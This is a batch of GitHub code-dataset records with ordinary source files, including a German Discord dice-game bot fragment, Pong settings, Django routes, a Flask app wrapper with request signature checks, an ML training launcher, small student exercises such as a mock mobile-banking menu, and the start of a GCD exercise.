= hoch.spieler.einsen\n tief_1 = tief.spieler.einsen\n out_str += f\"Hoch: {self.mention_mit_deckel(hoch.spieler)} \"\n out_str += f\"mit: {self.wurf_to_emoji(hoch.spieler.augen,einsen=hoch_1)} \"\n out_str += f\"im {im_wievielten[hoch.wurf_anzahl]}. \\n\"\n out_str += f\"Tief: {self.mention_mit_deckel(tief.spieler)} \"\n out_str += f\"mit: {self.wurf_to_emoji(tief.spieler.augen,einsen=tief_1)} \"\n out_str += f\"im {im_wievielten[tief.wurf_anzahl]}. \\n\"\n out_str += f\"Als nächstes ist {self.mention_mit_deckel(naechster)} \"\n out_str += f\"mit `!wuerfeln` dran. \"\n return out_str\n\n def gen_enter_halbzeit_output(self, spieler_liste, num_halbzeit):\n if num_halbzeit == 1:\n out_str0 = f\"**Halbzeit {num_halbzeit} beginnt. Die Reihenfolge ist:**\\n\"\n member_list = [self.name_to_member(sp.name) for sp in spieler_liste]\n out_str0 += \", \".join([m.mention for m in member_list])\n out_str0 += f\"\\n{member_list[0].mention} ist mit `!wuerfeln` dran.\"\n elif num_halbzeit == 2:\n out_str0 = f\"**Halbzeit {num_halbzeit} beginnt. Die Reihenfolge ist:**\\n\"\n member_list = [self.name_to_member(sp.name) for sp in spieler_liste]\n out_str0 += \", \".join([m.mention for m in member_list])\n out_str0 += f\"\\n{member_list[0].mention} ist mit `!wuerfeln` dran.\"\n elif num_halbzeit == 3:\n out_str0 = f\"** Das Finale beginnt. Die Reihenfolge ist:**\\n\"\n member_list = [self.name_to_member(sp.name) for sp in spieler_liste]\n out_str0 += \", \".join([m.mention for m in member_list])\n out_str0 += f\"\\n{member_list[0].mention} ist mit `!wuerfeln` dran.\"\n return out_str0\n\n def gen_runde_vorbei_output(self, halbzeit, num_halbzeit):\n verlierer = halbzeit.spieler_liste[0]\n verlierer_old = next(\n s for s in self.game_old.state.spieler_liste if s.name == verlierer.name\n )\n deckel = verlierer.deckel - verlierer_old.deckel\n verl_member = self.name_to_member(verlierer.name)\n out_str = f\"{verl_member.mention} verliert die Runde und bekommt \"\n deckel_emoji = self.emoji_by_name(\"kronkorken\")\n out_str += f\"{deckel} {deckel_emoji}.\\n\"\n out_str += self.gen_info_header(halbzeit, num_halbzeit, neue_runde=True)\n out_str += f\"Du bist mit `!wuerfeln` an der Reihe, \"\n out_str += f\"{self.mention_mit_deckel(verlierer)}.\"\n return out_str\n\n def gen_wuerfel_output(self, spieler, halbzeit, reicht_comment=False, einsen=0):\n max_wuerfe = halbzeit.rdm.num_maximale_wuerfe\n aus_der_hand = einsen == 0\n augen = spieler.augen\n wurf_emoji = self.wurf_to_emoji(augen, einsen)\n # besonderer wurf?\n augen_name = str(wurf.welcher_wurf(augen, aus_der_hand=aus_der_hand))\n\n if halbzeit != self.game.state:\n # hier rein, wenn halbzeit old reingegeben wurde\n spieler_old = self.spieler_by_name(spieler.name, halbzeit.spieler_liste)\n out_str = f\"{self.mention_mit_deckel(spieler_old)} wirft \"\n else:\n out_str = f\"{self.mention_mit_deckel(spieler)} wirft \"\n\n im_wievielten = {\n 1: \"im ersten\",\n 2: \"im zweiten\",\n 3: \"im dritten\",\n }\n im_wievielten.update({0: im_wievielten[max_wuerfe]})\n out_str += wurf_emoji + f\" {im_wievielten[spieler.anzahl_wuerfe]}. \"\n\n if \"Gemuese\" in augen_name:\n if augen[0] < 5:\n comment_choices = [\n \"Gar nicht mal so gut...\",\n \"Schlechtes Gemüse...\",\n \"Das kannst du besser!\",\n \"Wow.\",\n ]\n reicht_choices = {\n \"reicht\": [\" Aber reicht sogar.\"],\n \"reichtnicht\": [\" Und reicht nicht mal.\"],\n }\n\n elif augen[0] == 5:\n comment_choices = [\n \"Das kann man noch schlagen.\",\n \"Ausbaufähig...\",\n ]\n reicht_choices = {\n \"reicht\": [\" Aber reicht sogar.\"],\n \"reichtnicht\": [\" Und reicht nicht mal.\"],\n }\n\n elif augen[0] == 6:\n comment_choices = [\n \"Hohes Gemüse.\",\n \"Nicht schlecht!\",\n ]\n reicht_choices = {\n \"reicht\": [\" Und reicht sogar.\"],\n \"reichtnicht\": [\" Aber reicht gar nicht.\"],\n }\n\n elif \"General\" in augen_name:\n comment_choices = [\"Kann man liegen lassen.\", \"General.\"]\n reicht_choices = {\n \"reicht\": [\" Reicht ja.\"],\n \"reichtnicht\": [\" Aber reicht gar nicht.\"],\n }\n\n elif \"Straße\" in augen_name:\n if augen[-1] == 1:\n comment_choices = [\n \"Da is' ne 1 dabei.\",\n \"Keine schöne Straße.\",\n ]\n reicht_choices = {\n \"reicht\": [\" Aber würde reichen.\"],\n \"reichtnicht\": [\" Reicht ja nicht mal\"],\n }\n\n else:\n comment_choices = [\n \"Straße.\",\n ]\n reicht_choices = {\n \"reicht\": [\" Reicht.\"],\n \"reichtnicht\": [\" Reicht ja nicht mal\"],\n }\n\n elif \"Schock\" in augen_name:\n if \"out\" in augen_name:\n comment_choices = [\n \"Nice.\",\n \"Random Schock Out.\",\n \"Würde ich liegen lassen.\",\n ]\n reicht_choices = {\n \"reicht\": [\" Reicht.\"],\n \"reichtnicht\": [\" Aber reicht ja nicht mal.\"],\n }\n else:\n comment_choices = [\"Schöner Schock.\"]\n reicht_choices = {\n \"reicht\": [\" Reicht auch.\"],\n \"reichtnicht\": [\" Aber reicht gar nicht.\"],\n }\n\n elif \"Herrenwurf\" in augen_name:\n comment_choices = [\"Herrenwurf. Verliert nicht.\"]\n reicht_choices = {\n \"reicht\": [\" Und reicht sogar.\"],\n \"reichtnicht\": [\" ...aber diesmal vielleicht schon.\"],\n }\n\n elif \"Jule\" in augen_name:\n comment_choices = [\"Schöne Jule.\"]\n reicht_choices = {\n \"reicht\": [\" Und sie reicht.\"],\n \"reichtnicht\": [\" Aber reicht leider nicht.\"],\n }\n\n out_str += f\"\\n{random.choice(comment_choices)}\"\n\n if reicht_comment:\n hoch, tief = halbzeit.rdm.hoch_und_tief()\n reicht = tief.spieler.name != spieler.name\n if reicht:\n out_str += random.choice(reicht_choices[\"reicht\"])\n else:\n out_str += random.choice(reicht_choices[\"reichtnicht\"])\n\n return out_str\n","repo_name":"papr/schocken","sub_path":"src/schocken/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":33938,"program_lang":"python","lang":"de","doc_type":"code","stars":3,"dataset":"github-code","pt":"85"} +{"seq_id":"31284505849","text":"screen_data = {\r\n 'SCREEN_WIDTH': 1500,\r\n 'SCREEN_HEIGHT': 800,\r\n 'SCREEN_BGCOLOR': 'black',\r\n 'SCREEN_TITLE': 'Pang Pong',\r\n 'VERT_SPACE_CUT': 125,\r\n 'HOR_SPACE_CUT': 200,\r\n 'PADDLE_FROM_SIDE_DISTANCE': 30\r\n}\r\n\r\nscoreboard_data = {\r\n 'FIELD_COLOR': 'yellow',\r\n 'FIELD_OUTLINE_SIZE': 5,\r\n 'TOP_LEFT': (-screen_data['SCREEN_WIDTH']/2 + screen_data['HOR_SPACE_CUT'],\r\n screen_data['SCREEN_HEIGHT']/2 - screen_data['VERT_SPACE_CUT']),\r\n\r\n 'TOP_RIGHT': (screen_data['SCREEN_WIDTH']/2 - screen_data['HOR_SPACE_CUT'],\r\n screen_data['SCREEN_HEIGHT']/2 - screen_data['VERT_SPACE_CUT']),\r\n\r\n 'BOT_LEFT': (-screen_data['SCREEN_WIDTH']/2 + screen_data['HOR_SPACE_CUT'],\r\n -screen_data['SCREEN_HEIGHT']/4 - screen_data['VERT_SPACE_CUT']),\r\n\r\n 'BOT_RIGHT': (screen_data['SCREEN_WIDTH']/2 - screen_data['HOR_SPACE_CUT'],\r\n -screen_data['SCREEN_HEIGHT']/4 - screen_data['VERT_SPACE_CUT']),\r\n 'BOARD_COLOR': 'white',\r\n 'SCORE_COLOR': 'red',\r\n 'BOARD_ADJUST': 40,\r\n 'BOARD_CENTER_TEXT_X': 0,\r\n 'BOARD_FONT': 'Arial',\r\n 'BOARD_FONT_SIZE': 36,\r\n 'WINNING_FONT_SIZE': 24,\r\n 'BOARD_FONT_TYPE': 'bold',\r\n 'BOARD_ALIGN': 'center',\r\n 'MAX_SCORE': 7\r\n}\r\n\r\npaddle_data = {\r\n 'PADDLE_SIZE': (8, 1),\r\n 'PADDLE_COLOR': 'white',\r\n 'TOP_BOUNDARY': scoreboard_data['TOP_RIGHT'][1],\r\n 'BOT_BOUNDARY': scoreboard_data['BOT_RIGHT'][1],\r\n 'PADDLE_STARTX': scoreboard_data['TOP_RIGHT'][0] - screen_data['PADDLE_FROM_SIDE_DISTANCE'],\r\n 'PADDLE_STARTY': 0,\r\n 'PADDLE_MOVEMENT': 45\r\n}\r\n\r\nball_data = {\r\n 'BALL_SPEED': 10,\r\n 'BALL_COLOR': 'red',\r\n 'TOP_BOUNDARY': scoreboard_data['TOP_RIGHT'][1],\r\n 'BOT_BOUNDARY': scoreboard_data['BOT_RIGHT'][1],\r\n 'RIGHT_BOUND_X': scoreboard_data['TOP_RIGHT'][0],\r\n 'LEFT_BOUND_X': scoreboard_data['TOP_LEFT'][0],\r\n 'START_POSITIONS': [40, 130, 220, 310],\r\n 'LEFT_BOT_CORNER_ANGLE': 225,\r\n 'LEFT_TOP_CORNER_ANGLE': 135,\r\n 'RIGHT_BOT_CORNER_ANGLE': 315,\r\n 'RIGHT_TOP_CORNER_ANGLE': 45,\r\n 'SUCCESS_SPEED_UP': 0.25\r\n}","repo_name":"SaadNasir92/PONG","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"74641359316","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('flowcharts/', views.FlowchartViewSet.as_view({'get': 'list'}), name='flowchart-list'),\n path('flowcharts//', views.FlowchartViewSet.as_view({'get': 'retrieve'}), name='flowchart-list'),\n path('locations/', views.LocationViewSet.as_view({'get': 'list'}), name='location-list'),\n\n # ------------------------------------------- Charts ---------------------------------\n path('incident_per_location/', views.incident_per_location, name='incident_per_location'),\n path('total_incident/', views.total_incident, name='total_incident'),\n path('incident_per_contingency/', views.incident_per_contingency, name='incident_per_contingency'),\n path('contingency-plans/', views.ContingencyPlanViewSet.as_view({'get': 'list'}), name='contingency-plans'),\n path('incident-per-month/', views.incident_per_month, name='incident-per-month'),\n\n # ---------------------------------- FlowCharts ----------------------------------------\n path('HistoryChange//', views.HistoryChangeViewSet.as_view({'get': 'retrieve'}), name='history-change-detail'),\n path('flowchart-utility/', views.flowchart_utility, name='flowchart-utility'),\n\n # ---------------------------------- ScreenShot ----------------------------------------\n path('screenshot/', views.ScreenViewSet.as_view({'post': 'create'})),\n path('screenshot//', views.ScreenViewSet.as_view({'get': 'retrieve'})),\n\n\n\n]","repo_name":"amirreza-ghaffari/js_test","sub_path":"flowchart/api/v1/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"69805803797","text":"# -*- coding: utf-8 -*-\n\nimport os, sys, traceback, hmac, hashlib, time\nimport flask\nfrom flask import Flask, Blueprint, request, g, json, jsonify, after_this_request\nfrom ..core.env import config, logger, logging\nfrom .exceptions import MeleeHTTPException, BadRequest, SignatureError, ServerError\n\nclass MeleeApp(object):\n\n def __init__(self, import_name):\n self.import_name = import_name\n self.app = Flask(import_name)\n\n self.logger = logging.getLogger('%s.api' % config.servicename)\n self.app.log = self.logger\n self.app.before_request(self.before_request)\n self.app.after_request(self.after_request)\n self.app.teardown_request(self.teardown_request)\n self.app.register_error_handler(Exception, self.error_handler)\n\n for code in [400, 401, 402, 403, 404, 405, 406, 408, 409, 410, 411, 412, 413, 414,\n 415, 416, 417, 418, 422, 428, 429, 431, 500, 501, 502, 503, 504, 505]:\n self.app.register_error_handler(code, self.error_handler)\n\n @self.app.route('/')\n def helloworld():\n # return flask.make_response(('wellcome to melee!', 200, None))\n return 'wellcome to melee!'\n\n self._init()\n\n logger.info('STARTUP', 'meleeapp %s created' % config.servicename)\n\n def _init(self):\n # init the rds sql connections\n self.rdsdb = None\n if config.rds_binds:\n app_config = {'SQLALCHEMY_BINDS': config.rds_binds}\n for k, v in config.rds_pool_config.iteritems():\n app_config['SQLALCHEMY_%s' % k.upper()] = v\n self.app.config.update(app_config)\n from flask.ext.sqlalchemy import SQLAlchemy\n self.rdsdb = SQLAlchemy(self.app)\n logger.info('init SQLALCHEMY rds', config.rds_binds.keys(), app_config)\n\n def verify_signature(self, sig_kv, signature, content, timestamp):\n key = config.sigkey(str(sig_kv))\n if not key:\n return False\n rawdata = '%s%s'% (content, timestamp)\n if isinstance(content, unicode):\n rawdata = rawdata.encode('utf-8')\n sig = hmac.new(key, rawdata, hashlib.sha256).hexdigest().lower()\n return sig == signature.lower()\n\n def before_request(self):\n self.logger.info('REQUEST', '%s?%s' % (request.path, request.query_string), request.endpoint, request.data or request.values.to_dict(), request.headers.get('User-Agent'))\n g.endpoint = request.endpoint.split('.')[-1] if request.endpoint else None\n g.rawdata = request.data\n g.jsondata = {}\n if request.endpoint is None:\n return\n g.startms = int(time.time()*1000)\n\n content = request.values.get('content')\n signature = request.values.get('signature', '')\n sig_kv = request.values.get('sig_kv')\n timestamp = request.values.get('timestamp') or 0\n g.jsonpcallback = request.values.get('callback')\n\n if content:\n if not timestamp or (time.time()*1000)-int(timestamp) > 86400000:\n raise BadRequest(description='request expired %s' % timestamp)\n\n if not self.verify_signature(sig_kv, signature, content, timestamp):\n raise SignatureError(description='Signature Not Correct.')\n try:\n g.jsondata = json.loads(content)\n except:\n g.jsondata = {}\n\n if config.appids and g.jsondata.get('appid') not in config.appids:\n raise BadRequest(description='Reqeust appid error')\n\n\n def teardown_request(self, exc):\n if exc:\n self.logger.error('SHOULD_NOT_HAPPEN','teardown_request, has exception:%s'%(exc))\n\n def after_request(self, response):\n if request.endpoint is None:\n return response\n if response is None:\n return response\n\n g.request_cost = int(time.time()*1000) - g.startms\n\n if getattr(g, 'response_code', None) is None:\n code = response.status_code\n else:\n code = g.response_code\n\n # 支持jsonp, 解决ajax get 请求跨域问题\n #if g.jsonpcallback:\n #response.response = '%s(%s)' % (g.jsonpcallback, response.response)\n response.headers['Access-Control-Allow-Origin'] = '*'\n\n self.logger.info('REQUEST', request.remote_addr, request.method, g.request_cost,\n '%s?%s' % (request.path, request.query_string), request.headers.get('Content-Length', '0'), g.jsondata, \n response.status_code, code, response.response, str(response.headers.get('Content-Length', '0')))\n\n return response\n\n def error_handler(self, error):\n self.logger.error('EXCEPTION', sys.exc_info()[1])\n self.logger.error('TRACEBACK', traceback.format_exc())\n \n if isinstance(error, MeleeHTTPException):\n g.response_code = error.code\n return jsonify(meta=error.info)\n else:\n error = ServerError(description=getattr(error, 'message', error.__class__.__name__))\n g.response_code = error.code\n return jsonify(meta=error.info)\n\n\n def mount(self, blueprints, prefix=None):\n \"\"\"bind the specific blueprints to the current flask app.\n :param blueprints: list, the list of blueprints\n :param prefix: dict, the url_prefix mapping definition for every blueprint\n Example Code:\n >>>blueprint = Blueprint('template', __name__, url_prefix='/test')\n >>>@blueprint.route('/foo')\n ...def foo():\n ... return jsonify('foo ok')\n ...\n >>>meleeapp.mount([blueprint], prefix={'template': '/template'})\n now you can access the url 'http://host:port/template/test/xxx'\n \"\"\"\n if not blueprints:\n return\n for b in blueprints:\n if prefix and b.name in prefix:\n url_prefix = '%s%s' % (prefix[b.name], b.url_prefix or '')\n else:\n url_prefix = b.url_prefix\n self.app.register_blueprint(b, url_prefix=url_prefix)\n self.logger.info('STARTUP', 'register blueprint %s: %s' % (b.name, url_prefix))\n\n\n def __call__(self, environ, start_response):\n \"\"\"Mark this MeleeApp as a WSGI App\n So all middleware that support WSGI protoal can run the instance of it.\n \"\"\"\n return self.app(environ, start_response)\n\n\n def runserver(self, arguments):\n # @self.app.route('/')\n # def helloworld():\n # # return flask.make_response(('wellcome to melee!', 200, None))\n # return 'wellcome to melee!'\n\n from werkzeug.serving import run_simple\n options = {}\n options.setdefault('use_reloader', True)\n options.setdefault('use_debugger', True)\n logger.info('STARTUP', 'meleeapp %s started' % config.servicename)\n run_simple(arguments['--host'], int(arguments['--port']), self, **options)\n\n\n def runtasklet(self, arguments):\n self.logger.debug(config.servicename, 'tasklets starting ...')\n from ..core.tasklet import TaskletManager\n tasklet_manager = TaskletManager.get(config.tasklets)\n tasklet_manager.startall()\n\n\n def initdb(self, arguments):\n self.logger.info(config.servicename, 'start intidb ...')\n # init rds db\n if config.rds_binds:\n self.logger.info(config.servicename, 'start init rdsdb ...')\n self.rdsdb.create_all()\n # init baiduyun lbs db\n if config.baiduyun_ak:\n self.logger.info(config.servicename, 'start init baiduyun tables ...')\n from ..baiduyun.lbs import LBSTable\n for c in LBSTable.__subclasses__():\n self.logger.info('init baiduyun table', c.__tablename__, c.init_schema(config.baiduyun_ak))\n # init mongodb multi clients index model db\n if config.mongodb_clients:\n self.logger.info(config.servicename, 'start init mongodb ...')\n from ..nosql.mongodb import BaseMongoMultiClientIndexModel\n def __createindex(__model):\n if __model.__subclasses__():\n for __submodel in __model.__subclasses__():\n __createindex(__submodel)\n else:\n __model.create_index()\n __createindex(BaseMongoMultiClientIndexModel)\n\n self.logger.info(config.servicename, 'end intidb')\n\n def run(self):\n usage = \"\"\"MeleeApp Running in Command-Line\n\n runserver: run the wsgiserver in one process\n runtasklet: run all tasklets defined in the config file in one parent process with subprocesses\n\n Usage:\n server.py runserver [--host=] [--port=]\n server.py runtasklet [--pythonpath=] [--chdir=]\n server.py initdb [--baiduyun]\n\n Options:\n -h --help Show this\n --host= the host used to run the server [default: 127.0.0.1]\n --port= the port used to run the server [default: 5000]\n --pythonpath= Add additonal python sys.path.\n --chdir= Chdir to specified directory before apps loading. \n\n \"\"\"\n\n from docopt import docopt\n arguments = docopt(usage)\n # process common command options\n self._process_cmd_options(arguments)\n\n if arguments['runserver']:\n return self.runserver(arguments)\n elif arguments['runtasklet']:\n return self.runtasklet(arguments)\n elif arguments['initdb']:\n return self.initdb(arguments)\n else:\n print(usage)\n raise RuntimeError('not supported command')\n\n def _process_cmd_options(self, arguments):\n if arguments['--pythonpath']:\n paths = arguments['--pythonpath'].split(',')\n for path in reversed(paths):\n if os.path.exists(path) and os.path.isabs(path):\n sys.path.insert(0, path)\n if arguments['--chdir']:\n os.chdir(arguments['--chdir'])\n\n\napp = MeleeApp(__name__)\n\n \n","repo_name":"leeyingmu/melee","sub_path":"melee/webhttp/wsgiapp.py","file_name":"wsgiapp.py","file_ext":"py","file_size_in_byte":10209,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"85"} +{"seq_id":"25800836027","text":"\nimport os,sys\nsys.path.insert(0, '/home/madhu/work/codes')\nfrom main import check_endWith, check_create_dir, check_env, write_file, count_lines\n\n# import time, datetime\nfrom datetime import datetime\nimport TS_finetune_MP\n\n'''\n\nThis scripts does the model training. \n\nAn example call: \npython /home/madhu/work/codes/ML_codes/madhu_codes/TS_finetune_run_MP.py /home/madhu/work/class_outputs/p5_decoding_epitranscriptional_native_RNA_seq /home/madhu/work/ref_transcriptome/IVT_seq/IVT_seq.fa model_output__train_p5_m6A_3_512_1500_512_1__A/ 1 3 512 6 F 1500 512 1 A A1 |& tee /home/madhu/Logs/finetune__train_p5_m6A_3_512_1500_512_1__A.log\n\nInputs are: \nbasefolder, REF_GENOME, output_model_dir, TRAIN_epoch, layers, hidden_layers, cuda_id, F, lr, batch_size, downsampling_rate, METHYL_TYPE, TEST_CHR (optional)\n\n'''\n\nif __name__=='__main__' and '__file__' in globals():\n\n check_env('torch')\n\n\n startTime = datetime.now()\n current_time = startTime.strftime(\"%Y/%m/%d at %H:%M:%S\")\n print('\\n\\nThe script starting at: ' + str(current_time), ' \\n\\n' )\n\n ###############################################################################\n ###### The following needs to be updated #######\n # basefolder = '/home/madhu/work/class_outputs/p3_m6A_RNA_modification_native_RNA_seq'\n # TRAIN_epoch = 1\n # REF_GENOME = '/mnt/labshare/share/reference_genome/EpiNano_Reference_sequences/cc.fasta'\n\n basefolder = sys.argv[1]\n REF_GENOME = sys.argv[2]\n output_model_dir = sys.argv[3]\n TRAIN_epoch = int(sys.argv[4])\n # METHYL_TYPE = sys.argv[12]\n\n ###############################################################################\n\n # basefolder = '/home/qliu10/projects/TAD/analysis/ft_tfrecordguppy_v5.0.11//'; # revise\n # basefolder = '/home/madhu/work/analysis/p3_m6A_RNA_modification_native_RNA_seq'\n \n basefolder = check_endWith(basefolder)\n\n para_dict = {}\n para_dict['save_folder'] = basefolder + output_model_dir; # revise\n # para_dict['save_folder'] = '/home/qliu10/projects/TAD/analysis/testModelguppy_v5.0.11/'; # revise\n\n check_create_dir(para_dict['save_folder'])\n # if os.path.isdir( para_dict['save_folder'] ):\n # os.system('mkdir {}'.format( para_dict['save_folder'] ))\n\n para_dict['save_file_pref'] = 'BilstmMean.'+'layers'+sys.argv[5]+'.hs'+sys.argv[6]+'.'+sys.argv[8]+'.lr'+sys.argv[9]+'.b'+sys.argv[10]+(\".p\"+str(int(float(sys.argv[11])*1000+0.5)) if len(sys.argv)>7 else \"\")\n \n print(basefolder, para_dict['save_file_pref'])\n\n # 337,837\n para_dict['warmup_seq'] = 10000\n para_dict['save_frequency'] = 10000 ; #para_dict['warmup_seq']\n para_dict['log_frequency'] = 100 ; #para_dict['warmup_seq']//10\n \n # para_dict['train_epoch'] = 5\n para_dict['train_epoch'] = TRAIN_epoch; # revise\n para_dict['size_layers'] =int(sys.argv[5])\n para_dict['size_hidden'] =int(sys.argv[6])\n para_dict['METHYL_TYPE'] = sys.argv[12]\n\n print('The methyl type is: ', para_dict['METHYL_TYPE'])\n\n # para_dict['cpu_devices'] = 3; #\n para_dict['cuda_devices'] = 1;\n para_dict['cuda_id'] = sys.argv[7];\n # print('para_dict: ', para_dict['cuda_id'])\n para_dict['adam_learning_rate'] = int(sys.argv[9])/1e7\n para_dict['input_batch_size'] = int(sys.argv[10])\n if len(sys.argv)>11:\n para_dict['downsampling_rate'] = float(sys.argv[11])\n if para_dict['downsampling_rate'] < 1e-10:\n del para_dict['downsampling_rate']\n if 'downsampling_rate' in para_dict and para_dict['downsampling_rate']<0.03:\n para_dict['train_epoch'] = 1000\n del para_dict['downsampling_rate']\n \n if len(sys.argv)>14:\n para_dict['ft_learning_rate'] = float(sys.argv[14])\n para_dict['save_file_pref'] = para_dict['save_file_pref'] + \".ft\"+str(int(float(sys.argv[14])*1e7+0.5))\n if len(sys.argv)>15:\n para_dict['saved_model'] = sys.argv[15]\n\n # for DNA;\n #para_dict['length_thr'] = 1000\n # for RNA ## run on 2023/03/04 forget to comment this # revise\n para_dict['length_thr'] = 200\n\n # print(datetime.datetime.now())\n try:\n is_ft_t = (True if sys.argv[8] in [1, '1', 'T', 'True', 'true'] else False)\n ## The first one will have the label 0 and the second one 1. \n #datafs = [basefolder+'/FAH58492_MN17479/', basefolder+'/MN17273_FAH58548/']\n #datafs = [basefolder+'/MN17273_FAH58548/', basefolder+'/FAH58492_MN17479/']\n\n # datafs = [basefolder+'/GSM3528749/TFRec_bp_FT/', basefolder+'GSM3528750/TFRec_bp_FT/'] # revise\n datafs = [basefolder+'train/class_0/', basefolder+'train/class_1/'] # revise\n \n if len(sys.argv)>13:\n if len(sys.argv[13]) == 2:\n TS_finetune_MP.finetuneTrainer( para_dict = para_dict, datafolders=datafs, is_ft=is_ft_t, ref_seq_file=REF_GENOME, index_file=\"tfrecord.index\", random_seed=3, not_use_chr=sys.argv[13] )\n else:\n # print('(sys.argv[13]: ', sys.argv[13])\n # print('len(sys.argv[13]): ', len(sys.argv[13]))\n print('\\n\\n\\n****** The chromosome not to be used should only have the length: 2, such as U1 *******\\n\\n\\n')\n else:\n TS_finetune_MP.finetuneTrainer( para_dict = para_dict, datafolders=datafs, is_ft=is_ft_t, ref_seq_file=REF_GENOME, index_file=\"tfrecord.index\", random_seed=3 ); # revise\n \n # TS_finetune_MP.finetuneTrainer( para_dict = para_dict, datafolders=datafs, is_ft=is_ft_t, ref_seq_file=REF_GENOME, index_file=\"tfrecord.index\", random_seed=3, not_use_chr=['cc6m_2244_T7_ecorv'] )\n\n\n except Exception as e:\n print(traceback.format_exc())\n print(e)\n # print(datetime.datetime.now())\n # print(datetime.datetime.now())\n\n executionTime = (datetime.now() - startTime)\n current_time = datetime.now().strftime(\"%Y/%m/%d at %H:%M:%S\")\n print('\\n\\nThe script completed at: ' + str(current_time))\n print('Execution time: ' + str(executionTime), ' \\n\\n')\n\n\n","repo_name":"Madhurananda/my_current_work_draft","sub_path":"codes/ML_codes/madhu_codes/TS_finetune_run_MP.py","file_name":"TS_finetune_run_MP.py","file_ext":"py","file_size_in_byte":6168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"36679642471","text":"def discount():\n if cash == \"cash3000\":\n print(price - 3000)\n elif cash == \"cash5000\":\n print(price - 5000)\n else:\n print(price)\n\nif __name__ == '__main__':\n price = float(input(\"가격을 입력하시오: \"))\n cash = input(\"cash3000, cash5000중 해당을 입력하시오: \")\n discount()","repo_name":"jihoo1018/dojang_project","sub_path":"statements/unit_13_할인쿠폰.py","file_name":"unit_13_할인쿠폰.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"39592105476","text":"celular = 3209161848\ncontra = 1234\nsaldo = 4500\nop = \"s\" or \"S\"\nintentos = 3\n\nfor i in range (1,4):\n\n msg = int(input(\"Ingrese el número de celular: \\n \"))\n password=int(input(\"Digite los 4 digitos de su contraseña: \\n\"))\n\n if msg == celular and password == contra:\n\n while op == \"s\" or \"S\":\n print(f\"¡Bienvenido a nequi! \\n Su saldo es de: {saldo}\")\n select = int(input(\"Digite 1 para sacar dinero. \\nDigite 2 para enviar dinero. \\nDigite 3 para recargar dinero. \\nDigite 4 para salir. \\n\"))\n\n if select == 1:\n opcion = int(input(\"Digite 1 para sacar el dinero por cajero. \\nDigite 2 para punto fisico.\\n\"))\n if opcion == 1:\n print(f\"Su saldo actual es: {saldo}\")\n retiro = int(input(\"¿Cuanto desea retirar?\\n\"))\n if retiro > saldo:\n print(\"No tienes fondos para retirar.\")\n elif retiro <= saldo:\n saldo = saldo - retiro\n print(\"Su codigo es: 987654\")\n print(f\"Su saldo actual es {saldo}\")\n elif retiro < 2000:\n print(\"No te alcanza.\")\n elif opcion == 2:\n print(f\"Su saldo actual es: {saldo}\")\n retiro = int(input(\"¿Cuanto desea retirar?\\n\"))\n if retiro > saldo:\n print(\"No tienes fondos para retirar.\")\n elif retiro <= saldo:\n saldo = saldo - retiro\n print(\"Su codigo es: 987654\")\n print(f\"Su saldo actual es {saldo}\")\n elif retiro < 2000:\n print(\"No te alcanza.\")\n\n elif select == 2:\n print(f\"Su saldo actual es {saldo}\")\n numero = int(input(\"Ingrese el número de telefono al que desea enviar el dinero.\\n\"))\n valor = int(input(\"Ingrese el valor que desea enviar.\\n\"))\n if valor > saldo:\n print(\"No tienes fondos suficientes para enviar.\")\n elif valor <= saldo:\n saldo = saldo - valor \n print(f\"Usted ha enviado {valor} al número {numero}, le quedo un saldo de {saldo}\")\n\n elif select == 3:\n recarga = int(input(\"Ingrese el valor que desea recargar.\\n\"))\n preg = int(input(\"Digite 1 para realizar la recarga. De lo contrario digite 2\\n\"))\n if preg == 1:\n saldo = saldo + recarga\n print(f\"Su recarga ha sido realizada exitosamente, su saldo actual es {saldo}\")\n elif preg == 2: \n print(\"Ha cancelado la recarga.\")\n elif select == 4:\n print(\"Gracias por usar nequi.\")\n op = input(\"Si desea elegir otra opcion, escriba SI. De lo contrario escriba NO.\\n\")\n\n saldo = saldo -retiro\n\n else:\n intentos = intentos - 1\n print(f\"¡Upps! Parece que tus datos de acceso no son correctos, Tienes {intentos} intentos más\")\n \n if intentos == 0:\n print(\"Ha agotado todos sus intentos.\")","repo_name":"DavidM0208/Python","sub_path":"Nequi/acceso.py","file_name":"acceso.py","file_ext":"py","file_size_in_byte":3248,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"6276974739","text":"#\n# Abstract Algebra: Theory and Applications\n# Chapter 2, Programming Exercise #3\n#\n# Write a computer program that will implement the Euclidean algo-\n# rithm. The program should accept two positive integers a and b as input\n# and should output gcd(a, b) as well as integers r and s such that\n# gcd(a, b) = ra + sb.\n#\n# That function is [gcd_extended]\n#\n# The [gcd_core_recursive] and [gcd_core_nonrecursive] functions are alternative cores\n# that simply calculate the GCD of two numbers (they don't also return r and s). They\n# need to be plugged into the [create_gcd] function to generate the actual GCD implementation\n# However, only the [gcd_extended] function generates r and s values. The [create_gcd] function\n# which accepts the two cores simply returns the GCD and nothing else.\n#\n# The [inc], [dec] and [euclidean_division] functions are utility functions that are used both\n# by the GCD cores and the extended GCD function\n\n\n\nfrom __future__ import division\nimport unittest\nfrom math import sqrt\nfrom math import floor\nimport time\n\n############################################\n# #\n# U T I L I T Y F U N C T I O N S #\n# #\n############################################\n\ndef inc(n):\n return n+1\n\ndef dec(n):\n return n-1\n\n# If we want the gcd function to also work for negative numbers, we have to 'fix' integer division in Python\n# as they way it is implemented (for negative numbers) does not actually correspond to Euclidean division\n# What I am doing below is to define Euclidean division according to the Raymond T. Boute definition\n# (https://en.wikipedia.org/wiki/Modulo_operation). This is the definition that is more consistent with\n# number theory as attested by the fact that the Euclidean GCD computation algorithm (that also produces,\n# in addition to the GCD, the r and s values) works for negative numbers only with the Raymond T. Boute definition\n# of Euclidean division.\ndef euclidean_division(a, b):\n '''\n Returns quotient and remainder of a divided by b according to 